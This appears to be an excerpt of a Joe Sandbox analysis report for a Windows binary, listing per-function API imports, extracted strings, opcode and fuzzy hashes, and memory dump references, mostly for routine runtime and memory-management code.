Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
Instruction ID: e4c708134709141a1f2125b16f8f7ec427f256701ce76c2136724c4c5a78ac0c
Opcode Fuzzy Hash: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
Instruction Fuzzy Hash: C23191B3A26B4683DE299F5AF854269A371EF58BC0F448431CB9E07791EF3CE4418250

Function 00007FF7796FFF19 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970003A
realloc.MSVCRT ref: 00007FF7797000E0
malloc.MSVCRT ref: 00007FF7797000F9
memcpy.MSVCRT ref: 00007FF779700114

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpyrealloc
String ID:
API String ID: 2642181057-0
Opcode ID: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
Instruction ID: 51c766a92644e3c5435e9fd99ffeaf8e8d26304dbbcbff67287997231f18dd09
Opcode Fuzzy Hash: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
Instruction Fuzzy Hash: A331D033637B8281DA55AF25E4402E9A2B1FB49BD1F844535CA9D4B385EE38E151C360

Function 00007FF77970C940 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970C9AA
realloc.MSVCRT ref: 00007FF77970CA06
memcpy.MSVCRT ref: 00007FF77970CA20
realloc.MSVCRT ref: 00007FF77970CA58

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
Instruction ID: a7acff15680dc3ebb07278f402c5c57db3fe17f61328fc2e5d4488004201a8ba
Opcode Fuzzy Hash: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
Instruction Fuzzy Hash: DA3165A3A26B4683DE29DF56F850269A371FB5CBC0F448531CB8E07751EF3CD4418250

Function 00007FF779707190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779707358
memcpy.MSVCRT ref: 00007FF779707374

Strings

%af, xrefs: 00007FF77970730A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memcpyrealloc
String ID: %af
API String ID: 2500458235-435209106
Opcode ID: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
Instruction ID: 03b509cc249c93a752747cc9af1940d802e28ececcf8c2d52823d48d0de05666
Opcode Fuzzy Hash: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
Instruction Fuzzy Hash: AC51AD63B2D6C147D73A8B34E940BADBF71DB96391F448225DF6903B95EA3DC6068700

Function 00007FF7796F2410 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7796F1247), ref: 00007FF7796F2589

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF7796F271B
Unknown pseudo relocation bit size %d., xrefs: 00007FF7796F270B

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
Instruction ID: 33950585ea6fb64bc86a7cda7552ada226113aa499c6ef47cee104e078273748
Opcode Fuzzy Hash: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
Instruction Fuzzy Hash: 79516E33A3A547C6EB10AF25E8406AAA773EB48794F844631C91D43794DE3CE596CB20

Function 00007FF77970BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970BF01
realloc.MSVCRT ref: 00007FF77970BFEA

Strings

struct, xrefs: 00007FF77970BED0

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocrealloc
String ID: struct
API String ID: 948496778-3130185518
Opcode ID: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
Instruction ID: 42bce73cbc9c245912a13b1a66a6aff8710ecddf548a4bad651ddb4f5fd5216a
Opcode Fuzzy Hash: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
Instruction Fuzzy Hash: 5A41C073A26B8682DB24DF1AE8446A9A770FB48FD1F444132DF8C477A0DF38D5928350

Function 00007FF7796FEB10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF7796FEB49
realloc.MSVCRT ref: 00007FF7796FEBDD

Strings

ble for , xrefs: 00007FF7796FEB69

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: ble for
API String ID: 471065373-1503916205
Opcode ID: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
Instruction ID: f19ef1c40473dcb466682a9e5e74844f397f29e1e40cfbf8bb3fb157fdc1ef7c
Opcode Fuzzy Hash: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
Instruction Fuzzy Hash: 493191B7A26B4682EE199F16E54016DA7B2FB98FD0B448532CF9E47764EF2CD4918200

Function 00007FF7796FD2D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7796FD313

Strings

std, xrefs: 00007FF7796FD36F

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID: std
API String ID: 2803490479-2826573480
Opcode ID: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
Instruction ID: 8ae7ca3753f30a4e38d31498b7e7014ebe652b5e79d3f6d5dd21a45db497f4eb
Opcode Fuzzy Hash: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
Instruction Fuzzy Hash: E531A23363B74385EA55AF14E0153BAA6B6AB09B90F850635CB9C4A3D1EF3CF4468320

Function 00007FF77970EF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970EFAA
realloc.MSVCRT ref: 00007FF77970F037

Strings

vector[, xrefs: 00007FF77970EFBF

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: vector[
API String ID: 471065373-3542213508
Opcode ID: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
Instruction ID: 2bab05cd7e304ce600818f110bbfcf3f711ea4c9535956958f67ec87019214b8
Opcode Fuzzy Hash: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
Instruction Fuzzy Hash: 363192B3A26B4682DF699F1AE94026DE371EB58FC0B448432CF9E47764DF2CE4518310

Function 00007FF7797094E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779709520
realloc.MSVCRT ref: 00007FF7797095B3

Strings

&, xrefs: 00007FF779709545

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: &
API String ID: 471065373-1010288
Opcode ID: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction ID: c7ff17afbd19b3418593a372a380b2f4f9974194891229bed3e6bcb7865a581b
Opcode Fuzzy Hash: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction Fuzzy Hash: DB31A0B391AB8682DB25DF2AF4402AAB7A1F758BC4F448621DB9D47794DF3CD401C350

Function 00007FF7796F4A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7796F4A8C
fflush.MSVCRT ref: 00007FF7796F4B5C

Strings

libunwind: pc not in table, pc=0x%llX, xrefs: 00007FF7796F4B40

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: EntryFunctionLookupfflush
String ID: libunwind: pc not in table, pc=0x%llX
API String ID: 1930725923-1970586329
Opcode ID: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
Instruction ID: 17413a7c93f74e02ee7ee2e08332c57c98665227de39ecf977a4ffae4d57ffa5
Opcode Fuzzy Hash: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
Instruction Fuzzy Hash: 4031A17393AB9281E7159F3494807A8B3B2EF89B88F548335CA4D56795FF389491C350

Function 00007FF77970AF70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970AFA8

Strings

r"" , xrefs: 00007FF77970AFC7
operator, xrefs: 00007FF77970AFB9

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: operator$r""
API String ID: 471065373-3690342460
Opcode ID: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
Instruction ID: 186517d2d92a085bcfdc0948ba1379110c14756ef47cdc5499bc1db231ee6fe4
Opcode Fuzzy Hash: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
Instruction Fuzzy Hash: 9E1190B3A26B8682DA19AF06E9401A8A771EB98FD0F408432CF4D07754EF28D5A28310

Function 00007FF779713A80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 00007FF779713AA7

Strings

%s , xrefs: 00007FF779713AE1
[%Y-%m-%d %H:%M:%S], xrefs: 00007FF779713AC5

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _time64
String ID: %s $[%Y-%m-%d %H:%M:%S]
API String ID: 1670930206-899559958
Opcode ID: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction ID: c23ecd564a993f898eac60266c8f88a1f4a0d72e129c16675ce64161bd7f1877
Opcode Fuzzy Hash: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction Fuzzy Hash: 02016532639B8392E620AF11B8513FAA375EBCC7D0F804435E98E13B559E3CD145C760

Function 00007FF7796F2390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7796F23EA

Strings

Unknown error, xrefs: 00007FF7796F23B4
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7796F23DD

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
Instruction ID: 775a5bb1bf22d0d9dccd225002abb15b1d1df4eb657718f4b816eff095d1992e
Opcode Fuzzy Hash: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
Instruction Fuzzy Hash: 19F0A41393A94683D610AF24A5410BAA333FB493D1F808631DF4D96251EF1CE1428710

Function 00007FF779710777 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 00007FF779710779
strlen.MSVCRT ref: 00007FF779710AE1

Strings

(null), xrefs: 00007FF779710781

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: strerrorstrlen
String ID: (null)
API String ID: 960536887-3941151225
Opcode ID: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
Instruction ID: 548a4299058f50add3c56765ddb355d47582f1fca687a56c51a378bb05612d84
Opcode Fuzzy Hash: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
Instruction Fuzzy Hash: 87E01A12BBF203C3E904BE1154120FEE5725FCC7D1FE84875E94E52286EE2CE40151E1

Function 00007FF7796F35C0 Relevance: 5.1, APIs: 4, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF7796F35F6
strcmp.MSVCRT ref: 00007FF7796F360E
strcmp.MSVCRT ref: 00007FF7796F3629
strcmp.MSVCRT ref: 00007FF7796F3641

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
Instruction ID: 17b765689386abbd5251657bb6d66876dadbb1306d6540458c90b849f5dad374
Opcode Fuzzy Hash: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
Instruction Fuzzy Hash: E621127393BA4382EA78AF12D24453AE6F3FB447D0F958531CB4D86790EE3DE8818610

Function 00007FF7796F4FFE Relevance: 5.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7796F5012
TlsGetValue.KERNEL32 ref: 00007FF7796F504B
GetLastError.KERNEL32 ref: 00007FF7796F5050
LeaveCriticalSection.KERNEL32 ref: 00007FF7796F50CC

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
